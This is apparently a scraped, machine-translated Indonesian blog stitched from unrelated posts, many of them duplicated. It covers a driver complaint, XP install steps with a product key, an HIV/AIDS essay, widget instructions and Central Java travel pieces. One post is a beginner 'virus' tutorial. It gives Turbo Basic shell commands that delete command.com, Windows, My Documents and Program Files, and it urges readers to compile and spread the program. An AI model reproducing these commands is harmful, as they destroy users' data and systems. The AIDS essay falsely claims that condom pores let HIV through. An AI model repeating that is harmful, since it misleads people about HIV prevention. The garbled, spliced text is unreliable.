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x-ware mengecewakan karena sulit di temukan drivernya dan juga sering rusak maka dari itu kalau anda ingin membeli produk harus teliti memilihnya saya kecewa karena baru 4 bulan kok sudah rusak lasngsung saya kembalikan ketempat saya beli untuk di garansikan eh malah suruh bayar,kalau x-ware tidak memberikan drivernya dengan gratis saya yang akan memberikan kepada kalian semua dengan driver x-ware x-2100 ini kalian bisa mendownload dibawah ini
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How to make destructive programs (viruses)
Virus Making For Beginners
Destroyer program (virus) is the desire part of the computer novice, but how they could make if they do not know the programming language at all, you do not be anxious for this problem because now the author will teach you how to make a destroyer program (virus) is very simple but very deadly once it can be said even more terrifying than any destroyer program.
First skill you need is a DOS base, without it you would be hard to be creative in making this program but if you do not know some basic DOS commands so you can just copy paste it, the programming language we will use the Turbo Basic v1.0, you can download it on Google.
Open Turbo Basic, if you are blind Turbo Basic programming then you go to Edit and then you write Source Code destroyer program.
shell "DOS Command"
the beginning said shell then you can run DOS commands on the program, for example you made:
shell "c:"
shell "cd \"
shell "del command.com"
Above is an example of deleting Classic DOS with DOS, Windows 95/98, so the user can not boot the computer, we demonstrated the others.
shell "c:"
shell "cd \"
shell "deltree / y mydocu ~ 1"
shell "deltree / y windows"
shell "deltree / y progra ~ 1"
Above is an example of deleting Directory My Document, Windows and Program Files, so fatal is not it?
Once you have finished making program then you save first, how to select File and then Save and name the file eg VIRUS.BAS, only then we'd compile the source code, how to select Options and select Compile to EXE files, then go to options and then compile you enter, the source code will be EXE file.
If the EXE file is run then your computer will run DOS commands on the program, from the tutorial above, you can create for yourself how you made the virus can be run in accordance with your wish, please note that NO ONE in this world ANTIVIRUS PROGRAM TO DETECTING THE VIRUS so you are free to mengcopykan computer program anywhere you like except the non-DOS-based computer or Windows, hehe
To find out once again that the author is not responsible for anything you do with this tutorial, but it may be used as references that you should be very careful in opening EXE files.
How to make destructive programs (viruses)
Virus Making For Beginners
Destroyer program (virus) is the desire part of the computer novice, but how they could make if they do not know the programming language at all, you do not be anxious for this problem because now the author will teach you how to make a destroyer program (virus) is very simple but very deadly once it can be said even more terrifying than any destroyer program.
First skill you need is a DOS base, without it you would be hard to be creative in making this program but if you do not know some basic DOS commands so you can just copy paste it, the programming language we will use the Turbo Basic v1.0, you can download it on Google.
Open Turbo Basic, if you are blind Turbo Basic programming then you go to Edit and then you write Source Code destroyer program.
shell "DOS Command"
the beginning said shell then you can run DOS commands on the program, for example you made:
shell "c:"
shell "cd \"
shell "del command.com"
Above is an example of deleting Classic DOS with DOS, Windows 95/98, so the user can not boot the computer, we demonstrated the others.
shell "c:"
shell "cd \"
shell "deltree / y mydocu ~ 1"
shell "deltree / y windows"
shell "deltree / y progra ~ 1"
Above is an example of deleting Directory My Document, Windows and Program Files, so fatal is not it?
Once you have finished making program then you save first, how to select File and then Save and name the file eg VIRUS.BAS, only then we'd compile the source code, how to select Options and select Compile to EXE files, then go to options and then compile you enter, the source code will be EXE file.
If the EXE file is run then your computer will run DOS commands on the program, from the tutorial above, you can create for yourself how you made the virus can be run in accordance with your wish, please note that NO ONE in this world ANTIVIRUS PROGRAM TO DETECTING THE VIRUS so you are free to mengcopykan computer program anywhere you like except the non-DOS-based computer or Windows, hehe
To find out once again that the author is not responsible for anything you do with this tutorial, but it may be used as references that you should be very careful in opening EXE files.
How to Install Computer Birthdays
In computer science, one important thing to understand is how the computer or reinstall the operating system.
That's what the first step someone who wants to master the computer.
Here I briefly describe the course, how do I install Windows XP on a computer because this post is a temporary post, want xp downloads click here
1. Make sure that important data that does not want to remove your computer (hard drive) have been secured or moved to another partition (if the system in C, then save important data on other drives such reply: D, E, F, etc.).
2. Restart the computer, then press the DEL key when the computer back to life.
3. Now you enter in Part BIOS (basic input output system). search menu to manage booting (such as the Boot Configuration or something).
4. Fox boot sequence to CD / DVD Room that plays on the "First Boot".
5. Press F10 and then type Y, at the time required to ensure savings.
6. Let your computer restart again.
7. Press any key at the time appeared the words "Press any key to boot from CD"
8. After the blue screen will appear, click on the system partition to be installed (usually C: / /) press D to delete the contents of the partition.
9. Then press L according to the instructions on the bottom of the page.
10. Then press enter to start installing.
11. If then the message Approval press F8 to agree to (i agree).
12. Let the process run until the request comes passcode / Product key / password (eg to XP2: X8HPF-XP8BF-K24PJ-PY6BX-TWT6M)
13. Continue further setting in accordance with our needs, to select the time setting +07 For the city of Jakarta and so on.
Happy Birthday Installing your own computer.
Strong spirit that is the soul that stands alone without the influence of others ...
- Good Success --
How to Install Computer Birthdays
In computer science, one important thing to understand is how the computer or reinstall the operating system.
That's what the first step someone who wants to master the computer.
Here I briefly describe the course, how do I install Windows XP on a computer because this post is a temporary post, want xp downloads click here
1. Make sure that important data that does not want to remove your computer (hard drive) have been secured or moved to another partition (if the system in C, then save important data on other drives such reply: D, E, F, etc.).
2. Restart the computer, then press the DEL key when the computer back to life.
3. Now you enter in Part BIOS (basic input output system). search menu to manage booting (such as the Boot Configuration or something).
4. Fox boot sequence to CD / DVD Room that plays on the "First Boot".
5. Press F10 and then type Y, at the time required to ensure savings.
6. Let your computer restart again.
7. Press any key at the time appeared the words "Press any key to boot from CD"
8. After the blue screen will appear, click on the system partition to be installed (usually C: / /) press D to delete the contents of the partition.
9. Then press L according to the instructions on the bottom of the page.
10. Then press enter to start installing.
11. If then the message Approval press F8 to agree to (i agree).
12. Let the process run until the request comes passcode / Product key / password (eg to XP2: X8HPF-XP8BF-K24PJ-PY6BX-TWT6M)
13. Continue further setting in accordance with our needs, to select the time setting +07 For the city of Jakarta and so on.
Happy Birthday Installing your own computer.
Strong spirit that is the soul that stands alone without the influence of others ...
- Good Success --
HIV / AIDS epidemic
One Day in December is World AIDS. AIDS (Acquired Immune Degiciency Syndrome) is a viral disease caused by HIV (Human Immunodeficiency Virus). After the first discovered in 1981 in the United States (U.S.), disease of HIV / AIDS continues to spread to 150 countries, including Indonesia. The number of people with AIDS in the world in 1991 more than 1.2 million people, while HIV-positive patients reached 12 million. Based on data from UN agencies, there are currently 6.8 million people with AIDS, and 40 million are infected with HIV positive in the whole world.
Meanwhile, the number people living with HIV / AIDS in Indonesia continues to increase. Until September 2006 the total recorded number of HIV positive people reached 4617 and 6987 of AIDS. However, the case is the iceberg phenomenon; not more than the reported observed. Department of Health in 2006 estimated the number of Indonesian people are infected with HIV / AIDS ranges from 169 thousand-216 thousand people. From the number of sex workers (180 rbu-265 thousand people), 8200-9640 people have HIV terinfensi. Whereas sex customers in the largest Muslim country reaches 2.5 million people to 3.8 million people. From the number of 96 thousand prisoners, about 4300-6000 prisoners have HIV terinfensi. 2010, estimated number of HIV sufferers viruf reached 500 thousand people. Indeed, the rate of this deadly disease will continue to increase.
Not Kondomisasi Solutions
Recognized or not, the main cause of this virus is actually a brothel, sex, liwath (homosexual and lesbianism); in addition there are other ways of transmission such as drug users through needle and syringe. To overcome this problem, and steps have been taken by the Government is: a campaign of condom use (kodomisasi); sex education and reproductive health for adolescents to be able to have sex with a healthy and safe; encourage teens to make family planning (pre merital KB) with an injection of anti pregnant; and the similar. If this free sex risk of a fetus, not to worry, because abortion has been legalized.
Condom campaign and is currently being conducted with a very massive. Even people not shy to buy it because it was scattered ATM condoms.
On the other hand, the empirical experience of other countries, such as the U.S. and some European countries shows the failure kondomisasi in peyebaran prevent HIV / AIDS. Why? Because apparently, according to Prof. Dadang Hawari in his book, the Quran and Medical Science of Mental Health Life, the pores of the fabric latex condoms in diameter 1 / 60 micron, while the HIV virus-sized 1 / 250 microns. Thus, the pores of the condom four times greater than the HIV virus. As a result, condoms are not the solution to HIV / AIDS. Meanwhile, the main cause of spread of the deadly virus still left, that is adultery, sex, hiteroseks, homosexuals and the like.
In fact, in one occasion, Vice President, Jusuf Kalla (30/11/06) states that if it 'can not stand' against sex, do not be shy to use condoms, so families are not infected. This attitude, indirectly legalize adultery. So, naturally free sex and prostitution were rampant. While condom use was no longer safe, so rather than to prevent HIV / AIDS, which happened just the opposite. This is the resolution style secular system that never solve the problem, adding even more problems.
Those who incessantly call for kondomisasi think, that religious admonitions are not enough to stop sexually transmitted diseases, because religion is their only place it as a moral appeal alone, typical Secular ideology. Now, he says, already affected side. This affected not to infect others. The way is through kondomisasi.
There are two things that should be recorded. First: the view that religion is the only form of advice sekularistik view. For the case of other religions, may be true. However, for Islam is wrong. Islam does not separate religion and life, the concept (fikrah) by the method of implementation (tharîqah) it. Secondly: Islam also has a complete solution in the settlement of HIV / AIDS.
HIV / AIDS epidemic
One Day in December is World AIDS. AIDS (Acquired Immune Degiciency Syndrome) is a viral disease caused by HIV (Human Immunodeficiency Virus). After the first discovered in 1981 in the United States (U.S.), disease of HIV / AIDS continues to spread to 150 countries, including Indonesia. The number of people with AIDS in the world in 1991 more than 1.2 million people, while HIV-positive patients reached 12 million. Based on data from UN agencies, there are currently 6.8 million people with AIDS, and 40 million are infected with HIV positive in the whole world.
Meanwhile, the number people living with HIV / AIDS in Indonesia continues to increase. Until September 2006 the total recorded number of HIV positive people reached 4617 and 6987 of AIDS. However, the case is the iceberg phenomenon; not more than the reported observed. Department of Health in 2006 estimated the number of Indonesian people are infected with HIV / AIDS ranges from 169 thousand-216 thousand people. From the number of sex workers (180 rbu-265 thousand people), 8200-9640 people have HIV terinfensi. Whereas sex customers in the largest Muslim country reaches 2.5 million people to 3.8 million people. From the number of 96 thousand prisoners, about 4300-6000 prisoners have HIV terinfensi. 2010, estimated number of HIV sufferers viruf reached 500 thousand people. Indeed, the rate of this deadly disease will continue to increase.
Not Kondomisasi Solutions
Recognized or not, the main cause of this virus is actually a brothel, sex, liwath (homosexual and lesbianism); in addition there are other ways of transmission such as drug users through needle and syringe. To overcome this problem, and steps have been taken by the Government is: a campaign of condom use (kodomisasi); sex education and reproductive health for adolescents to be able to have sex with a healthy and safe; encourage teens to make family planning (pre merital KB) with an injection of anti pregnant; and the similar. If this free sex risk of a fetus, not to worry, because abortion has been legalized.
Condom campaign and is currently being conducted with a very massive. Even people not shy to buy it because it was scattered ATM condoms.
On the other hand, the empirical experience of other countries, such as the U.S. and some European countries shows the failure kondomisasi in peyebaran prevent HIV / AIDS. Why? Because apparently, according to Prof. Dadang Hawari in his book, the Quran and Medical Science of Mental Health Life, the pores of the fabric latex condoms in diameter 1 / 60 micron, while the HIV virus-sized 1 / 250 microns. Thus, the pores of the condom four times greater than the HIV virus. As a result, condoms are not the solution to HIV / AIDS. Meanwhile, the main cause of spread of the deadly virus still left, that is adultery, sex, hiteroseks, homosexuals and the like.
In fact, in one occasion, Vice President, Jusuf Kalla (30/11/06) states that if it 'can not stand' against sex, do not be shy to use condoms, so families are not infected. This attitude, indirectly legalize adultery. So, naturally free sex and prostitution were rampant. While condom use was no longer safe, so rather than to prevent HIV / AIDS, which happened just the opposite. This is the resolution style secular system that never solve the problem, adding even more problems.
Those who incessantly call for kondomisasi think, that religious admonitions are not enough to stop sexually transmitted diseases, because religion is their only place it as a moral appeal alone, typical Secular ideology. Now, he says, already affected side. This affected not to infect others. The way is through kondomisasi.
There are two things that should be recorded. First: the view that religion is the only form of advice sekularistik view. For the case of other religions, may be true. However, for Islam is wrong. Islam does not separate religion and life, the concept (fikrah) by the method of implementation (tharîqah) it. Secondly: Islam also has a complete solution in the settlement of HIV / AIDS.
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Just 2.langsung Feedjit you choose which one you like and copy HTMLnya
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Where do I install as Feedjit!!
yakita began aja aja we open feedjitklik site here to join
1.kalo already click on the menu bar select the widgets
Just 2.langsung Feedjit you choose which one you like and copy HTMLnya
3.buka block layout you edit the gadget added Talu select HTML / JavaScript Add paste
Open blog 4.langsung save you
good luck
Your tour in Central Java will not be complete if you have not visited the district Kebumen. Because the district is known as producer of bird's nest Swiftlet holds many tourist objects very interesting to visit. Call it for example, Jatijajar Cave Park is located 21 kilometers to the south Gombong, or 42 kilometers west Kebumen.
Jatijajar cave at the foot of limestone mountains. This tourism object is very interesting indeed. This limestone mountain range stretching from the north and south ends jutting into the sea in the form of a cape.
Your tour in Central Java will not be complete if you have not visited the district Kebumen. Because the district is known as producer of bird's nest Swiftlet holds many tourist objects very interesting to visit. Call it for example, Jatijajar Cave Park is located 21 kilometers to the south Gombong, or 42 kilometers west Kebumen.
Jatijajar cave at the foot of limestone mountains. This tourism object is very interesting indeed. This limestone mountain range stretching from the north generally danSebagaimana other tourist objects in Indonesia, which is almost always kept the legend, the Cave Jatijajarpun no exception. Words that have a story, this Jatjajar Cave in the past is a place of meditation Kamandaka Raden, who then got wangsit. Kamandaka Raden this story became known to legend Lutung Kasarung. Visualization of these legends can be seen in a diorama that is in that cave.
Enter into this cave, however there is a sense degdegan. Imagine! Because he felt like stepping into a dinosaur ancient animal's mouth. Add more if you imagine the horror dark atmosphere in the belly of the dinosaur. But anxiety was quickly lost, because the room was illuminated by electric lights from end to end. Although the cave's mouth wide enough, but the dinosaur's stomach even more. On the ceiling there is a hole for ventilation. In the middle there is a circular chair seating guests while enjoying the beauty and ornament Stalactite and dioramas stalagnit Lutung Kasarung legend.
Once satisfied watching this presentation, followed by a trip down the stairs to the room that is part of the tail of the dinosaur. Within this space, you can see the springs called Sendang. Number 4 is being such a fruit, that is Sendang Rose, kantil, Jombor and Puserbumi. Rose is being trusted has supernatural powers that can make a person stay young, so every visitor is always the time to wash the face with water that Sendang Rose. ends in the south bay to the sea in the form of a cape.
Filled with a sense of wonder and awe, without feel you've traveled 250 yards down the dinosaur's stomach. Fantastic is not it? And that's the truth. Not only that, even without your awareness, you have entered into the bowels of the earth as deep as 40 meters. Truly a relaxing adventure that could only be sampled at Jatijajar Cave Park.
Your tour in Central Java will not be complete if you have not visited the district Kebumen. Because the district is known as producer of bird's nest Swiftlet holds many tourist objects very interesting to visit. Call it for example, Jatijajar Cave Park is located 21 kilometers to the south Gombong, or 42 kilometers west Kebumen.
Jatijajar cave at the foot of limestone mountains. This tourism object is very interesting indeed. This limestone mountain range stretching from the north and south ends jutting into the sea in the form of a cape.
Your tour in Central Java will not be complete if you have not visited the district Kebumen. Because the district is known as producer of bird's nest Swiftlet holds many tourist objects very interesting to visit. Call it for example, Jatijajar Cave Park is located 21 kilometers to the south Gombong, or 42 kilometers west Kebumen.
Jatijajar cave at the foot of limestone mountains. This tourism object is very interesting indeed. This limestone mountain range stretching from the north generally danSebagaimana other tourist objects in Indonesia, which is almost always kept the legend, the Cave Jatijajarpun no exception. Words that have a story, this Jatjajar Cave in the past is a place of meditation Kamandaka Raden, who then got wangsit. Kamandaka Raden this story became known to legend Lutung Kasarung. Visualization of these legends can be seen in a diorama that is in that cave.
Enter into this cave, however there is a sense degdegan. Imagine! Because he felt like stepping into a dinosaur ancient animal's mouth. Add more if you imagine the horror dark atmosphere in the belly of the dinosaur. But anxiety was quickly lost, because the room was illuminated by electric lights from end to end. Although the cave's mouth wide enough, but the dinosaur's stomach even more. On the ceiling there is a hole for ventilation. In the middle there is a circular chair seating guests while enjoying the beauty and ornament Stalactite and dioramas stalagnit Lutung Kasarung legend.
Once satisfied watching this presentation, followed by a trip down the stairs to the room that is part of the tail of the dinosaur. Within this space, you can see the springs called Sendang. Number 4 is being such a fruit, that is Sendang Rose, kantil, Jombor and Puserbumi. Rose is being trusted has supernatural powers that can make a person stay young, so every visitor is always the time to wash the face with water that Sendang Rose. ends in the south bay to the sea in the form of a cape.
Filled with a sense of wonder and awe, without feel you've traveled 250 yards down the dinosaur's stomach. Fantastic is not it? And that's the truth. Not only that, even without your awareness, you have entered into the bowels of the earth as deep as 40 meters. Truly a relaxing adventure that could only be sampled at Jatijajar Cave Park.
Hindhu greatest legacy in Central Java and IstimewaYogyakarta Region is located adjacent to lebihkurang 17 miles northeast of Yogyakarta.
Prambanan is a complex enshrinement in the main temple facing the east, with the overall shape resembles leather puppets mount at up to 47 meters.
Religion Hindhu know Tri Murti consisting of Brahma as the Creator, the God of Whisnu as The Preserver, the god Shiva as the Destroyer. The main chamber of the main temple occupied by Lord Shiva as the Supreme Deity so it can be concluded that the temple is a temple of Prambanan Shiva.
Pramabanan Temple or Temple of Shiva is also often referred to as the temple of Roro related Jonggrang Legend narrating about a virgin who Jonggrang (tall) daughter of King Boko, the King is building a kingdom on the hill south of the temple of Prambanan, the temple edge bordered by a fence railing is decorated with reliefs of Ramayana story can be enjoyed with berperadaksina (walk around the temple to temple center is always on our right) through the alley, story continues on the fence balustrade of Brahma temple located left (south) of the main temple.
Was at temple baluster fence Whisnu located on the right (north) of the temple, there Dwipayana Krishna story relief depicting the story of King's childhood as penjilmaan Krishna (incarnation) Lord Whisnu in eradicating want keangkara anger throughout the world. Booth overlooking the main temple to the north contains a statue of Durga, consort Lord Shiva. but generally the people calling for the statue of Roro Jonggrang, who formerly lived body of the beautiful princess who is cursed by the Knights of Bandung Bondowoso, to complement its ability to create a statue of a thousand men in one night.
Brahma temple and the temple Whisnu each - each only has one room, occupied by a statue of the god - the god in question. The third front of the temple of Trimurti Gods that there are three temples containing vehicle or the three gods, three gods were now in disrepair and the only temple in the middle (in front of Shiva temple) which still contains a statue of a lembuyang named Nandi (vehicle of the god Shiva) . Swan statue as a vehicle of Brahma, and Garuda statue of the god Vishnu as the vehicle is estimated to first fill chamber - chamber of the temple is located in front of the god's temple, now gone. Sixth temple represent groups facing each other - before, lay in a square yard, with sides 110 meters long. In the yard of the temple was still standing - the other temples, namely 2 brace temple with a height of 16 meters line of sight, which one stands to the north and the other standing in the south, 4 temple curtain and 4 corner temples.
Pages in Hindhu society considered as the most sacred page, located in the middle of the page that has the 222 meters, and at the beginning of the temple - as many as 224 temples perwara deret around the page in three rows,. Outside the courtyard is still there outside the pages of a square with sides 390 meters long, the Prambanan temple complex built by King - King Wamca (Dinasty) Sanjaya in the 9th century and is now a tourist attraction that can be visited every day between 06.00 - 17.30 . Prambanan temple complex is situated only a few hundred yards from the roadway of Yogya - Solo crossed a busy public transportation.
Hindhu greatest legacy in Central Java and IstimewaYogyakarta Region is located adjacent to lebihkurang 17 miles northeast of Yogyakarta.
Prambanan is a complex enshrinement in the main temple facing the east, with the overall shape resembles leather puppets mount at up to 47 meters.
Religion Hindhu know Tri Murti consisting of Brahma as the Creator, the God of Whisnu as The Preserver, the god Shiva as the Destroyer. The main chamber of the main temple occupied by Lord Shiva as the Supreme Deity so it can be concluded that the temple is a temple of Prambanan Shiva.
Pramabanan Temple or Temple of Shiva is also often referred to as the temple of Roro related Jonggrang Legend narrating about a virgin who Jonggrang (tall) daughter of King Boko, the King is building a kingdom on the hill south of the temple of Prambanan, the temple edge bordered by a fence railing is decorated with reliefs of Ramayana story can be enjoyed with berperadaksina (walk around the temple to temple center is always on our right) through the alley, story continues on the fence balustrade of Brahma temple located left (south) of the main temple.
Was at temple baluster fence Whisnu located on the right (north) of the temple, there Dwipayana Krishna story relief depicting the story of King's childhood as penjilmaan Krishna (incarnation) Lord Whisnu in eradicating want keangkara anger throughout the world. Booth overlooking the main temple to the north contains a statue of Durga, consort Lord Shiva. but generally the people calling for the statue of Roro Jonggrang, who formerly lived body of the beautiful princess who is cursed by the Knights of Bandung Bondowoso, to complement its ability to create a statue of a thousand men in one night.
Brahma temple and the temple Whisnu each - each only has one room, occupied by a statue of the god - the god in question. The third front of the temple of Trimurti Gods that there are three temples containing vehicle or the three gods, three gods were now in disrepair and the only temple in the middle (in front of Shiva temple) which still contains a statue of a lembuyang named Nandi (vehicle of the god Shiva) . Swan statue as a vehicle of Brahma, and Garuda statue of the god Vishnu as the vehicle is estimated to first fill chamber - chamber of the temple is located in front of the god's temple, now gone. Sixth temple represent groups facing each other - before, lay in a square yard, with sides 110 meters long. In the yard of the temple was still standing - the other temples, namely 2 brace temple with a height of 16 meters line of sight, which one stands to the north and the other standing in the south, 4 temple curtain and 4 corner temples.
Pages in Hindhu society considered as the most sacred page, located in the middle of the page that has the 222 meters, and at the beginning of the temple - as many as 224 temples perwara deret around the page in three rows,. Outside the courtyard is still there outside the pages of a square with sides 390 meters long, the Prambanan temple complex built by King - King Wamca (Dinasty) Sanjaya in the 9th century and is now a tourist attraction that can be visited every day between 06.00 - 17.30 . Prambanan temple complex is situated only a few hundred yards from the roadway of Yogya - Solo crossed a busy public transportation.
L egenda Nyi Roro Kidul not be separated from the South Coast of Java Sea. This is reinforced by several petilasannya heritage and a supposedly left behind in some places, that we can still see today. The presence of these relics that caused the South Coast of Java Sea seems to have a magnetic force so strong that Untk always invite tourists to come and come again.
One of these beaches is Sand Beach, located in South Gombong, Kebumen regency, Central Java. This beach can be said to complete compared to other beaches. Besides flanked by two mountains that make beautiful scenery, the beach is also a land of fishermen to support the life of everyday routine. Every day tens of jongkong that lined the beach, except jongkong-jongkong the sea. This scene is characteristic of and specific coastal fishermen. On this beach, there are also fish auction (TPI) and breeding jellyfish.
The most interesting to note is the coral-shaped gate. Mysterious gate is the Gate of Nyi Roro Kidul. From a distance, the gate of this enchanting look like a bear who's drinking water.
The existence of the gate was the only one, the more raises a sand beach as a tourist attraction in Gombong, Kebumen, Central Java. And this is also the beautiful panorama is presented to you.